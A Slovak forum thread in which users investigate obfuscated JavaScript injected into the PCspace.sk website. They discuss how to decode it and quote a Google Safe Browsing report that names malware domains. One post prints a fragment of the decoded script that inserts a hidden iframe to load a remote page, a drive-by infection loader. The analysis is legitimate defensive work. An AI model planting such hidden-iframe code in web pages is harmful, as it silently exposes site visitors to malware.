PCspace.sk - distribuujeme malware

[Snake]

Pokiaľ ste dnes navštívili PCspace.sk, a mali zapnutý antivírus (povedzme NOD) a JavaScript, antivirák vám zobrazil dosť nepeknú hlášku podobnú tejto:

Keď mi Matej Koleják poslal tento screenshot, najprv som si myslel že sa jedná o nechutný žart a že u neho doznieva prvý apríl. Po návšteve stránky s firefox rozšírením NoScript (zakazuje elementy ako JS a Flash), a následnú inšpekciu DOM kódu, som zistil že sa nejedná o žart, ale v záhlaví sa nachádzal nasledovný silno obfuskovaný kód:
<a href="http://snake.havran.eu.sk/pretaktovanie ... b]Zobraziť PLAIN kód[/b][/center]</a>
Po preložení sa z neho stalo toto:
<a href="http://snake.havran.eu.sk/pretaktovanie ... b]Zobraziť PLAIN kód[/b][/center]</a>

Kde som zistil že kód má 2 levely obfuskácie, pričom druhý je realizovaný pomocou jednoduchého URL kódu (komu sa ho podarí dešifrovať nech mi pošle SS). Malware pravdepodobne sťahuje niečo z adresy uvedenej na obrázku.

To že JS sa oplatí mať vypnutý sa opäť potvrdilo, jedno z najlepších rozšírení NoScript taktiež pomohlo (každý by si ho mal nainštalovať, web je potom ozaj bezpečnejší), no a NOD32? Ukázal sa v dobrom svetle.

Za tip ďakujem Matejovi Kolejákovi (crux2005).

//edit 15:56:

Screenshot ako POC



//edit 13:37:

Dekodovany kod:
<a href="http://snake.havran.eu.sk/pretaktovanie ... b]Zobraziť PLAIN kód[/b][/center]</a>

[Gudas]

Fuj, prasata!
Kto ten web píše? Však to jak nejaký underground porno-warez server, bordel načítaný hneď na prvej stránke...

[Thunderbolt]

Aj mne NODka ukázala že je tam nejaký koník.

[pEpinko]

Mozem sa spytat, co znamena obfuskacia pomocu jednoducheho URL kodu?

Ja som to chvilu pozeral a dopracoval som sa k tomu ze cele to smeruje na cinsku domenu.

Inak pozeram, ze sa nam tu nejak rozrastla cenzura, clanok o Malackach a ich webe nejako nemozem najst...

[Snake]

Obfuskovaný kód >> http://en.wikipedia.org/wiki/Obfuscated_code" onclick="window.open(this.href);return false;

Ano smeruje to na .cn doménu

Čo sa týka článku malacky.sk, objaví sa tu keď sa tá chyba fixne, ako som písal aj tam, scritp-kiddies podporovať nemienim.

[pEpinko]

Co je obfuskovany kod viem, ale zaujimalo ma ci je obfuskacia pomocou jednoducheho URL nieco extra...

Ale kod to bol celkom zaujimavy asi by som mal pozerat take cosi castejsie. Cele to treba 2 krat dekodovat aby sme sa k niecomu dostali. Musim povedat, ze sucasne obfuskatory robia dobru pracu.

Ad Malacky: Chapem, zbytocne by sa tym poskodzovalo mesto... (Som zvedavy ci a ak ano tak kedy to vsetko opravia )

[Snake]

pEpinko: čím si preložil ešte string po HEX kóde? mne to pomocou jednoduchého

Kód: Vybrať všetko

<script type="text/javascript">
var array = "string";
array = unescape(array);
</script>
document.write(array);

nešlo

[pEpinko]

Po tom prelozeni (do tvojho space2.txt) je tam nieco ako

Kód: Vybrať všetko

faqCg('%32%37%31%33%30%33%35%32%46%05%3c%3c%05%29%5d%54 ...

je jasne ze, kod ktory nas zaujima je prave tam. Po prvom pohlade je jasne, ze je to string ktory vznikol pomocou funkcie javascriptu escape. V com nas utvrdi aj kod, kedze je tam riadok

Kód: Vybrať všetko

jFHtK = unescape(jFHtK);

Problemom ale je ze sa tam nachadzaju aj znaky ako backspace... A celkovo je to neecitatelne, dalej sa v kode ale robia upravy nad tymto stringom. Kedze sa mi ich nechcelo lustit, pekne som to oddebugoval vo virtualnom stroji kde mi nic nemoze . Potom som z tej jednej premennej skopcil kod.

Zacina nejak takto:

Kód: Vybrať všetko

function VzNQs() {};
VzNQs.prototype = {
  install: function() {
    if (!this.alreadyInstalled()) {
      var s = "<div style='display:none'><iframe src='" + this.getFrameURL() + "'></iframe></div>";
      try {

Pripadnym zaujemcom ho poslem aj cely.

[Snake]

môžeš to niekam hodiť

[pEpinko]

Dufam ze to pojde. ZIP ARCHIV

Niektore veci v tvare 5%^%Jhygded.replace('/gfhe/', ''); som uz vyhodnotil a prelepil to v kode aby to bolo citatelnejsie, inak je kod bez uprav.

[Snake]

zaujímavé čítanie dík

[Snake]

UPS

Safe Browsing
Diagnostic page for pcspace.sk

What is the current listing status for pcspace.sk?

This site is not currently listed as suspicious.

What happened when Google visited this site?

Of the 451 pages we tested on the site over the past 90 days, 1 page(s) resulted in malicious software being downloaded and installed without user consent. The last time Google visited this site was on 2009-04-12, and the last time suspicious content was found on this site was on 2009-01-14.

Malicious software includes 229 scripting exploit(s), 1 trojan(s). Successful infection resulted in an average of 9 new process(es) on the target machine.

Malicious software is hosted on 2 domain(s), including originalcn.cn/, typecn.cn/.

1 domain(s) appear to be functioning as intermediaries for distributing malware to visitors of this site, including mostdey.cn/.

This site was hosted on 1 network(s) including AS29208 (DIALTELECOM).

Has this site acted as an intermediary resulting in further distribution of malware?

Over the past 90 days, pcspace.sk did not appear to function as an intermediary for the infection of any sites.

Has this site hosted malware?

No, this site has not hosted malicious software over the past 90 days.

Navyše, vidím že oni to celkom ignorujú (správa z google a aj užívateľov)

http://www.pcsforum.sk/viewtopic.php?f=10&t=15104" onclick="window.open(this.href);return false;
http://www.pcsforum.sk/viewtopic.php?f=18&t=14256" onclick="window.open(this.href);return false;
http://www.pcsforum.sk/viewtopic.php?f=10&t=10040" onclick="window.open(this.href);return false;

[Gudas]

...čiže ináč povedané: vieme o tom už dlhšie, zatiaľ to nevieme riešiť, tak sem-tam treba rátať s nejakým tým malware na pcspace.sk. Pokúsime sa to definitívne riešiť bohviekedy...

Nice one

[Snake]

jop, presne tak to je myslené